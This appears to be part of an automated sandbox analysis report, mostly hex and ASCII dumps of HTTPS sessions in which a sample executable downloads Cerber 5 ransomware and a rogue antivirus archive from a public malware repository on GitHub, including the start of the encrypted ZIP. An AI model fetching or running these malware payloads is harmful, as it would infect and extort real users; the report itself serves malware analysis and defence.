8b 71 16 07 e4 7a 75 34 1d 81 14 94 a0 eb 70 6f 08 f5 f9 b9 5e 71 86 41 00 0a 7d a6 cb 32 f8 96 b5 ac 14 ab bd de 9e a8 6d 43 51 44 ce eb ed 11 cd 22 0c 88 4e d0
                                                                                                        Data Ascii: K5b:Z<(2Q)5&CO_rj!tJ5=AUFQ>qiUT$R~Lmx/^04M'Bw41<b?sDmx/b7UF"(}"<0_0[$29,k"A9PiBW 3qqzu4po^qA}2mCQD"N
                                                                                                        2022-09-29 12:46:30 UTC13308INData Raw: 50 74 bb db d7 bc 70 bc 80 50 48 6e 3a 0b 1c 96 7f 82 85 04 9f 3a ce f0 51 1c 3a 9b 8d ef ad e7 5e 08 51 87 65 be 93 88 69 eb 93 0e 4c a5 eb 43 1b 74 7b 92 67 3e 1e 7f a4 1e b9 19 34 a3 4e 5d f1 1b a0 42 0b 6d 5a 7b 84 f6 42 7e 33 84 03 70 07 38 57 34 b0 72 0c bd ad 14 66 a1 11 d3 b8 f4 29 33 dd 0d 3a e2 38 fd 1e df 19 4e 4d 89 3a 46 d1 c1 f2 3a cb 59 6f 8d c6 df 0c ed 9c ea 54 be 34 25 17 af 61 63 c7 10 e7 10 d1 c6 75 5c f7 13 7c db 27 96 05 fc 61 c9 4d fd 89 8e 3d 3e be 9b 23 20 25 bb 1e 56 73 f3 eb 8b 4e f6 cb 7f dc e7 53 04 61 84 34 b4 7c 8a f4 95 5c 01 55 18 dd 0b 05 f4 58 b0 15 45 9c 6f 8b b4 07 24 c7 c1 b1 65 fb 66 d9 cc b6 cd 05 9e f9 0c fc 2d 5f b7 aa 54 f8 f4 1a e4 eb bd ef 20 6e 0b a7 1f f1 d7 c7 e3 70 2f 44 ab f3 17 6e b9 d2 18 e8 19 4a eb aa
                                                                                                        Data Ascii: PtpPHn::Q:^QeiLCt{g>4N]BmZ{B~3p8W4rf)3:8NM:F:YoT4%acu\|'aM=># %VsNSa4|\UXEo$ef-_T np/DnJ
                                                                                                        2022-09-29 12:46:30 UTC13324INData Raw: 79 e1 7c 42 e3 49 f4 62 0f 34 c6 4e 9e 70 07 54 a7 86 15 53 0c 9b c8 5d ae 5f d2 88 d2 f3 dd 37 64 3e 04 b8 e5 d6 a1 f4 bc 63 a8 0a bd 5b 2f 47 a6 a0 dc 58 00 a6 33 41 f8 bc 82 fd b4 29 bf fd 1e 00 65 5a fb 2c 70 ed 50 11 f6 2b 12 02 cc 1d b1 ed e4 76 73 58 d4 78 c2 4d 36 d4 62 5f 45 fe 3a 0d 34 02 2a 23 76 e0 c4 8d 7e e9 5a c4 d1 fc 0e fc f6 b2 5a 77 8f 56 f7 76 79 60 18 92 84 ec 69 64 e5 49 25 d9 80 16 41 7d c3 cd ab b0 bb 99 48 ac 32 43 e4 0c 9b 39 40 3f ff 8a 12 df 6d 42 12 fa 93 bd e2 b2 ae a4 28 ca e3 42 51 52 ab 4d 2c ae 73 7e 29 73 b0 95 09 75 c1 92 90 67 c6 3d 18 5c 14 f8 17 b9 3b a7 6f 64 49 2f 15 e1 cf 48 5a 2c 4a 65 54 2e d6 da 13 24 62 f3 80 a4 ef 20 2d 54 20 12 61 cc 71 9b 2a 22 3f cf 06 39 4b 26 eb 91 f8 b4 d3 da 3d b1 7f 5d 73 17 55 e9 5e
                                                                                                        Data Ascii: y|BIb4NpTS]_7d>c[/GX3A)eZ,pP+vsXxM6b_E:4*#v~ZZwVvy`idI%A}H2C9@?mB(BQRM,s~)sug=\;odI/HZ,JeT.$b -T aq*"?9K&=]sU^
                                                                                                        2022-09-29 12:46:30 UTC13340INData Raw: 14 bb e8 81 3a bd c3 69 65 8f c7 da 09 87 0f 1f 58 df 06 6e bf 65 31 b8 01 2b 9e bc 6c bc 31 31 6c 8e 77 e3 fb a1 1f 42 98 6f 46 42 b8 a4 c9 d4 e4 5f 93 f3 c6 4b de 1c 97 33 03 a2 ca 89 20 9f 54 e4 2c d2 70 47 a4 76 86 22 01 38 e4 30 df e8 c3 17 c9 50 53 7d 3f b3 73 d1 b8 7f bb 5a fa f7 9b eb f6 03 03 1e af c4 1f ca e8 51 f9 28 37 1e dd af 46 5b f5 e4 a9 19 c2 54 17 56 f3 ad d8 97 cb a1 39 74 44 e1 ad 1b e7 58 64 3d 7a ca 17 78 88 ca fc f2 de a9 11 ee c2 cf 47 bb 00 a9 7a 55 99 30 01 98 c1 11 9a 89 47 b5 a3 7a 64 ac 32 5c 81 28 7d 1d a3 34 ec db 23 39 6d 8f b3 d2 a4 79 50 f8 1c ab 6f da 61 74 8d fd 67 63 5b 2e 3e 96 eb e0 6d 03 93 ee ca 96 c2 20 f5 17 fe f8 6b 64 3e 4f 64 90 f6 a7 39 38 05 32 1e e7 c4 af f9 a1 74 b9 93 91 a2 4a f6 d2 e1 4d a4 4c 58 d2 bf
                                                                                                        Data Ascii: :ieXne1+l11lwBoFB_K3 T,pGv"80PS}?sZQ(7F[TV9tDXd=zxGzU0Gzd2\(}4#9myPoatgc[.>m kd>Od982tJMLX
                                                                                                        2022-09-29 12:46:30 UTC13356INData Raw: 95 9f 28 e8 0b 16 be cc 22 d6 3b 67 cf 6e 92 6f b9 57 5e 52 fd a7 01 78 9e 31 9f 37 67 98 8d f1 0e e1 56 e3 58 22 10 b9 d8 d8 bf 7a f7 f7 c1 8a b5 16 3b d8 ce 98 f9 4c 8a 3b 23 fe e6 15 59 f7 e4 ae e7 d2 72 7e 08 28 9b c1 c3 87 42 ca c0 a3 d4 5f 45 79 4d af 47 82 7a 68 80 d2 92 4f e3 73 df cd 6d c6 45 c3 ec 10 dc 11 28 9e 90 4b a2 87 19 d7 70 0c a9 4b 29 0e d8 8e 37 bf 50 35 6d 4c 15 5a 87 f9 21 21 07 9d 63 f9 c0 9c 6d 84 cd a1 d3 9e 1f 3d 15 74 22 67 7e d2 fe 5d 1d ee 98 1a b4 4b 45 63 5c e7 22 46 57 c2 0b 2c be b8 0e dc e0 4c 99 1a ad 3d 45 22 75 88 d9 7e 52 82 8a 01 ff 45 2a c7 31 58 96 51 5d ec 2e b5 ad 6b 1a 42 35 a5 99 42 cf 5d 3b 78 40 64 97 c2 db 04 53 ff dd 3e f8 dd 11 81 e5 73 9e d1 58 ad c6 39 8d d8 3c 1d 6c 4b 2e a6 db 80 ca 37 ef 86 32 1f 0e
                                                                                                        Data Ascii: (";gnoW^Rx17gVX"z;L;#Yr~(B_EyMGzhOsmE(KpK)7P5mLZ!!cm=t"g~]KEc\"FW,L=E"u~RE*1XQ].kB5B];x@dS>sX9<lK.72
                                                                                                        2022-09-29 12:46:30 UTC13372INData Raw: 1b 07 23 51 c1 70 ca be 8a c5 fd ca ef 06 af 6f 12 4f 91 d7 57 af 2f d2 b1 91 3f f6 b1 a3 f8 74 78 5e b5 06 03 7b f6 81 c2 d9 6c 2f 2a 97 22 14 6b 83 fb 54 17 c8 cf 25 7b af 47 b5 d5 ec a3 fa 0f 7e 7b a8 be 3a 3e 64 7a a2 2d 77 f3 0b 1b 40 34 23 54 99 ad 0d 01 ae 8d 9c 80 31 fb ef 45 41 6d 74 1c 0c a5 04 3c a4 8c 88 a6 b6 12 65 b7 a8 1d fc c8 da bf ec 18 a1 ab da df 56 54 19 23 ff 0f 73 d3 4d 07 bb be fe 58 b5 7d 1c cc 21 6f 1c 6f 99 fe a8 10 47 a8 e2 38 16 69 78 46 d5 5f 95 1d 48 01 f9 c3 7a 11 17 36 40 95 ba 0f 13 a4 a0 57 f8 dc c1 f8 2e 36 d9 77 18 e5 7e 4b 9f 18 d0 57 40 f6 7a a6 8e 6b 6a 62 e3 8a f0 53 66 bf 5c 08 05 32 93 99 74 09 51 8d 09 3a 6f 39 d5 80 d9 66 52 eb 70 7c 93 58 cf 5c 7b 22 55 55 9d d9 3c 4e 40 b3 2e af b8 f9 30 1b 50 6c 95 1e 13 5f
                                                                                                        Data Ascii: #QpoOW/?tx^{l/*"kT%{G~{:>dz-w@4#T1EAmt<eVT#sMX}!ooG8ixF_Hz6@W.6w~KW@zkjbSf\2tQ:o9fRp|X\{"UU<N@.0Pl_
                                                                                                        2022-09-29 12:46:30 UTC13388INData Raw: f8 b8 cb 2d fd 58 7b 6c 90 51 45 7c 7e f7 84 be b3 e0 d5 08 d2 7c 36 17 1a b8 cb 92 b4 6a 7b 08 4f e0 77 9a 32 7e bd 28 ae 04 3f ec 80 d3 4b 8e 4f 75 f0 6d 1e a8 61 c2 b2 3a ec 35 5c 00 91 5c d9 e0 35 3d 12 f9 a9 6f 6f 4c bd a1 0c 7e 8f 71 ad 00 66 b1 80 c2 83 fa 3d dc f6 88 d6 96 ec 73 1c 71 62 61 8d b4 b7 be a2 77 38 5e 5a 63 a2 bf e6 be 5d 1e 9f 44 a8 25 d6 90 02 2a ac 64 af c8 24 55 55 cd 90 bb b8 10 db 61 21 a8 05 52 16 9e 26 5d b3 fa 0a 4f d9 3b 05 a3 f2 b2 77 58 da 29 a0 62 dc 96 75 6b d9 da 35 0c 2e 8c 3a e1 e9 fe 6f 4a 58 09 d2 09 c3 b2 75 ab 9b 8e d4 67 98 f6 f2 b1 4d 83 78 db 6c ad d4 b7 88 41 3a c4 6a e7 5f 6e 66 6f b2 2f ea 56 2f e1 6e a4 bb 6b 77 46 f9 ce 8d 95 db 72 40 35 5f 78 32 f1 f3 99 48 4a e9 0d 81 ba dc 40 7c 29 6f ab 02 a3 06 93 4d
                                                                                                        Data Ascii: -X{lQE|~|6j{Ow2~(?KOuma:5\\5=ooL~qf=sqbaw8^Zc]D%*d$UUa!R&]O;wX)buk5.:oJXugMxlA:j_nfo/V/nkwFr@5_x2HJ@|)oM
                                                                                                        2022-09-29 12:46:30 UTC13404INData Raw: f4 27 a4 cf df cd 52 62 25 56 ba 2e c2 53 d1 4d 8d ff b9 c5 cd 63 a9 d0 d5 b5 a0 10 a2 15 e8 a7 96 13 95 4f ea 0e 1c 62 9f a4 94 ad fc 27 d7 96 42 b5 91 2f 27 2e ee 17 08 36 1f 10 d3 93 cd 3f 9b 3a 70 91 5e 88 15 74 65 2c d8 9e 83 c3 82 28 67 66 99 9f 39 ee e0 e5 a4 87 49 2b 8c 88 36 c4 07 b1 cd a2 3d 81 3a ee 22 25 18 bb 8f cb f8 ba 12 51 54 3f 80 c9 8e e3 a0 98 07 39 ba 8c c7 81 52 70 e2 99 16 c2 bd 97 75 dd bc ec c5 27 6b 2d 5a 11 d8 3a 31 2f cb 2c 3d 5f ed c6 ae 7d d9 15 4e 66 3c 54 ed 33 af b5 b8 ce 4b 6c 16 76 94 ae c9 df d0 97 8b af 48 ee 07 b9 df 78 f5 ba b4 23 bd a2 17 ab 45 2b 2d b4 a5 d0 d6 c8 40 51 22 98 a8 b6 d6 c8 bb 6b c1 b3 2a 3f f8 48 54 8a 9c 37 9d 3a c4 23 17 9e 28 01 0c a9 eb 10 38 6f de 0b 97 29 3b e1 3c 1c 73 2f 85 4f 75 d7 55 cf 21
                                                                                                        Data Ascii: 'Rb%V.SMcOb'B/'.6?:p^te,(gf9I+6=:"%QT?9Rpu'k-Z:1/,=_}Nf<T3KlvHx#E+-@Q"k*?HT7:#(8o);<s/OuU!
                                                                                                        2022-09-29 12:46:30 UTC13420INData Raw: 9e 64 56 53 74 d2 09 47 db a0 23 06 9d 2a e3 92 c2 52 05 0e 03 e4 65 7a 0a 14 0c 05 09 97 59 43 59 83 c3 86 33 26 13 aa 78 91 83 4c 53 fb 20 d7 ee d5 20 d7 37 6f 44 a7 77 1d 30 0b a3 50 a2 14 a4 1f be 6e 8d 57 c3 45 ec a7 5a a6 dc 01 e0 bb d4 32 7b ca a7 0a af ad 5a 56 b7 70 9d e1 6d 96 1e e9 ad d8 c4 a0 dd 61 8c 51 ba 4e 53 c0 b7 7f fc ed ea 87 88 ba b5 36 12 ba fa 80 19 ed 02 4b f6 81 f7 1c d7 d4 c6 85 d4 f6 51 8d cd ff 47 07 db ff 9b 6e f7 e8 4b e0 8e f7 81 68 5a b0 d8 75 6b d5 c6 39 ec b8 e4 4c f4 84 c3 e1 fc 8d 55 17 29 0e 77 b1 ad 13 96 05 c3 4d de a6 96 13 87 31 60 40 96 c2 00 4f 54 ee 4a 22 8e d7 38 b7 94 d8 b6 63 da bd c2 75 a1 2a c6 f3 c6 76 03 50 4f 04 53 19 4c 16 2a 28 da 6e 9b 60 e4 f8 df 6e 97 c3 93 6f a0 84 c0 01 fd b6 ca 9e f8 18 6b 56 93
                                                                                                        Data Ascii: dVStG#*RezYCY3&xLS 7oDw0PnWEZ2{ZVpmaQNS6KQGnKhZuk9LU)wM1`@OTJ"8cu*vPOSL*(n`nokV
                                                                                                        2022-09-29 12:46:30 UTC13436INData Raw: ff 75 33 91 ba 15 50 bf 76 bc 7c 1c 03 90 ec c8 70 44 bc 2f 5c 6d 2a 96 f7 94 76 9c 6e 7e 24 d1 39 f1 44 f9 5e 7b f0 54 45 13 45 57 7d a1 b1 5d f0 5f 30 78 e3 66 18 ac cd 5d 9b 60 bf 6f 18 4c 29 5e 0b 85 6d c8 05 15 e0 c0 25 dc 6b 13 cd 18 8b e4 5b 50 19 02 63 e4 46 64 de d0 ef 24 53 05 6d 09 69 95 d7 be 2d 34 bb 55 ac 04 a6 b6 d1 d8 7b 5b 01 72 cc bb a4 9f 9b 09 c5 d3 93 f8 e4 33 11 ec 66 7e 50 a5 18 db d5 b1 a6 a4 e5 06 ec 83 1b 2f 92 73 be 44 9a 6b 68 27 97 5f 73 d8 7e 52 68 75 79 44 ff 66 36 8e 9e f5 38 f4 af 76 ef a4 e2 5f 7c 5b 0b 12 ff e1 d0 6a 24 01 21 e9 a7 98 71 2e 46 59 4b ee 89 05 fa 95 2e 5e 0d 35 52 17 0e 4b 49 7c a1 cb b4 61 92 f7 af 02 65 df 29 ed 05 b6 12 98 ec 78 24 d6 d3 86 25 c3 34 a3 8e 06 d0 44 4d f9 73 8e e2 ba eb bc c2 6c 0a ca 79
                                                                                                        Data Ascii: u3Pv|pD/\m*vn~$9D^{TEEW}]_0xf]`oL)^m%k[PcFd$Smi-4U{[r3f~P/sDkh'_s~RhuyDf68v_|[j$!q.FYK.^5RKI|ae)x$%4DMsly
                                                                                                        2022-09-29 12:46:30 UTC13452INData Raw: 3b 50 bd a4 26 eb fb 08 d5 95 74 a5 43 be f0 e2 58 05 81 62 55 58 14 db ea 8f e6 a5 39 fb 53 67 c3 17 5f 3b 4d 49 c4 4e 40 cc c1 5e b6 8e 84 fc 04 45 cf 26 25 3c f3 b3 68 7a b5 eb ae e5 0d ab e7 4c 9c 77 d7 8b f8 ab 8c b0 e5 54 51 6d 17 72 ea 58 39 2c 60 6b e7 91 f0 00 3e 63 95 5f 30 09 3d bc 92 e3 81 c3 1c 59 ae 32 54 51 45 c7 c3 e8 ae f7 3c 39 8b 21 f9 01 7a ed 4a 6e 2b c2 eb 81 27 68 40 a3 4d ff d5 15 be 41 4a 2a 9f fe 2e 0a 9b 45 5f 0a ef 39 5b 1c 69 47 26 4b b1 66 00 e2 00 c1 82 8f 13 aa 73 23 a9 29 2a 68 1b e3 e3 92 e5 1a 77 a3 93 26 82 c6 bc af b9 ee 36 06 b3 1c 42 a0 4f f2 06 a1 53 51 81 9c 36 65 05 e1 b2 37 07 b9 42 99 51 22 10 fe cb f3 c7 b5 66 ea 25 b1 a1 5a 9a de 52 00 c2 93 da 04 d8 ec b9 1f 7f 6d c8 41 cb 89 17 3e 37 9f ee 5f f6 29 a3 11 ca
                                                                                                        Data Ascii: ;P&tCXbUX9Sg_;MIN@^E&%<hzLwTQmrX9,`k>c_0=Y2TQE<9!zJn+'h@MAJ*.E_9[iG&Kfs#)*hw&6BOSQ6e7BQ"f%ZRmA>7_)
                                                                                                        2022-09-29 12:46:30 UTC13468INData Raw: cc 4d aa b5 16 6b a6 9f dd 09 3d e4 34 32 e5 2d fb 46 6f 0a 14 b4 2b fa 2b 51 fd b5 0f 7c 12 1c 5a 54 07 dd a9 32 76 12 56 c7 5b 1e fe bb cd 8f 0e b1 ad 72 7d 81 f5 81 4d 06 5a ac 4e 89 70 d4 65 6d cd c2 bf 95 0a ec 93 8b 21 dc ac 6c b0 46 ff 85 7d 30 e0 7b 63 db 8e 77 c0 80 3b 6f 9d ba f3 c1 41 db 53 28 98 44 b6 60 4f e7 0b 53 13 b5 c7 76 e5 35 c5 ea 2f 74 10 68 44 d9 73 28 e9 e6 0b 26 1d 59 1f f2 d3 07 0f 20 da ec 25 e5 1e 18 5f dc ad 6b fe f9 21 5d 70 2e b4 a9 e8 32 2d bf 8a df 6a 65 b7 f7 00 f4 2d fb ec 63 86 84 06 49 16 7a b8 e8 29 82 f0 69 0c ad 65 85 10 80 a1 df 14 bd 24 b6 5d 0e fe 1d 60 f6 d4 3c 6a c6 a7 e8 cb 1d 84 8c 14 a0 18 c0 b0 44 36 2b 2a 98 ea e6 59 fc 34 16 91 01 71 4a 3e 3b 5c fd 00 6c 36 d9 3f 08 ee 3f 76 f5 01 a6 73 8e f1 f2 29 af ee
                                                                                                        Data Ascii: Mk=42-Fo++Q|ZT2vV[r}MZNpem!lF}0{cw;oAS(D`OSv5/thDs(&Y %_k!]p.2-je-cIz)ie$]`<jD6+*Y4qJ>;\l6??vs)
                                                                                                        2022-09-29 12:46:30 UTC13484INData Raw: a9 0f 55 78 e2 84 3c 12 07 78 a9 90 96 42 da b4 3e e0 69 3b 14 50 f2 92 8b ed 6a 50 0b b2 7e d5 f1 66 29 1a d4 8c d0 02 13 bd 46 56 f3 89 c3 df b7 b6 27 9d c1 b4 06 68 a5 cd 88 1e de a1 48 98 6c 34 21 f3 26 ff 97 8f 47 a1 bd b1 bb 63 eb e4 46 69 f3 1a 40 52 78 fb df 1e 1e 9d 2c f9 6e e0 90 1a 7b e3 22 05 61 7f 4a dc 92 83 6d ee 91 a9 35 01 c7 2b 78 5d 10 7f 18 ba e0 a7 6c 6f 62 3d 00 02 b4 12 12 28 2b 8f 37 0b b2 af 19 8a b4 31 54 b7 c6 c2 b9 91 7a 38 ef e7 b7 91 47 4e db 8f 91 17 51 0d 31 27 e1 60 b6 30 85 fe 2a 60 2d 7c 86 29 c9 5e 60 31 73 39 72 f3 89 c7 06 a6 19 cc 62 21 78 12 5a 6b c1 84 52 e1 56 c5 0d eb 6c ae 1e ae 08 40 a0 c0 41 53 80 7c 66 0c e8 6e 18 b7 0a d1 3b 94 c8 97 ca 70 c1 f7 8d 5d e4 9b 7c 17 41 39 ac 2d da 93 ae 88 a9 8a 8f 4e 65 8f 38
                                                                                                        Data Ascii: Ux<xB>i;PjP~f)FV'hHl4!&GcFi@Rx,n{"aJm5+x]lob=(+71Tz8GNQ1'`0*`-|)^`1s9rb!xZkRVl@AS|fn;p]|A9-Ne8


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        4192.168.2.449711140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:06 UTC513OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:45:06 UTC513INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:22 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:45:06 UTC514INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        40192.168.2.449791140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:34 UTC13497OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/InternetSecurityGuard.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:34 UTC13497INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:46:33 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:34 UTC13498INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        41192.168.2.449792185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:35 UTC13500OUTGET /Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:46:35 UTC13500INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 2580873
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "9adcf2d9882d51d3dfdb11b5740aa53cd370781402b00f1834dcef303c637853"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: BC88:67BA:7CF8:C44B3:63359353
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:46:35 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6922-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455595.051889,VS0,VE5
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 6e66162d57f1bed0e4097875f3dbbec030e6645b
                                                                                                        Expires: Thu, 29 Sep 2022 12:51:35 GMT
                                                                                                        Source-Age: 88
                                                                                                        2022-09-29 12:46:35 UTC13501INData Raw: 50 4b 03 04 33 00 01 00 63 00 cd bb 2e 40 00 00 00 00 a5 60 27 00 00 40 62 00 24 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 49 6e 74 65 72 6e 65 74 53 65 63 75 72 69 74 79 47 75 61 72 64 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 5e 98 e3 cd 5d 7c 53 2d 9b 98 4f b5 7f 8f a4 41 23 fe 23 91 07 b9 55 ef 04 a3 c3 25 84 d2 88 da 08 89 21 d4 dd cf bf bb 58 d0 34 08 6d a9 a7 59 c6 4d 94 22 06 41 c5 ca 01 e2 9a 75 f1 bb 6c 2a 35 7a 71 8b a4 f2 1c 7a bd 0c e0 51 5d cf 08 aa 6e f9 ad a0 63 eb 59 bf 47 bb bb 28 99 fe 4f c6 8d 89 10 07 d6 11 a7 18 84 53 93 bd 67 78 cc 28 2c 6e c5 37 04 4d ea 9e a5 9e 0a 8d 6d d9 94 da 64 fa b7 14 f3 0b 0d 0c 69 42 e7 90 1e 53 46 a0 30 30 f1 19 73 eb 36 37 ae 82 27 0c e6 8b 65 b4 56 69 1a fa 91 3f 46 61 08 c2 8c 36 32 8f fd 45 7d 1b
                                                                                                        Data Ascii: PK3c.@`'@b$Endermanch@InternetSecurityGuard.exeAE^]|S-OA##U%!X4mYM"Aul*5zqzQ]ncYG(OSgx(,n7MmdiBSF00s67'eVi?Fa62E}
                                                                                                        2022-09-29 12:46:35 UTC13502INData Raw: 83 dc 83 f6 66 a5 fa 99 62 44 02 c8 12 c3 3a bd 59 17 fe c5 9b d0 32 37 8a 7c 82 51 3d c7 3f be db 5d b7 e3 ae 04 65 c6 de 99 27 9f 24 96 49 e2 97 0e 24 ea 4e 43 d4 de 82 08 f6 18 05 b8 50 58 3b 22 8b a9 80 e1 8d f8 6d 9e 18 8b 38 ee 56 86 ae e1 c7 d5 96 26 49 44 d5 0c 13 5b ce 65 55 d0 12 9e e8 33 2e 79 1c 5d d7 06 6b f8 bf 49 0e 00 d8 65 84 af 3f d3 ba 72 96 57 5c cf 56 5b 8f 2c 9b 5e 2c c3 3c 7e 3b 11 4f dd e8 88 98 e0 6c 5d 82 27 7a c5 1c 87 b1 e5 29 8e 69 e9 29 89 7f c3 89 c7 43 8d b6 4e 0b ab ec d1 a3 13 53 c0 ff 5f 4c fc 3a 8b 1d 95 5c f8 04 9d 9c 41 02 63 20 b0 36 54 b6 4d 39 d3 dc 8a 30 5d a3 50 f9 81 6e d5 dc 4e 05 9d 1b 4b d4 71 dd 06 c6 00 97 9d 7a f2 82 f5 ba f7 b0 9c 0f 50 f2 f3 79 d6 8b 6b 4d cc 2c b6 cb 90 22 10 b2 08 d3 2b 87 f7 89 33 36
                                                                                                        Data Ascii: fbD:Y27|Q=?]e'$I$NCPX;"m8V&ID[eU3.y]kIe?rW\V[,^,<~;Ol]'z)i)CNS_L:\Ac 6TM90]PnNKqzPykM,"+36
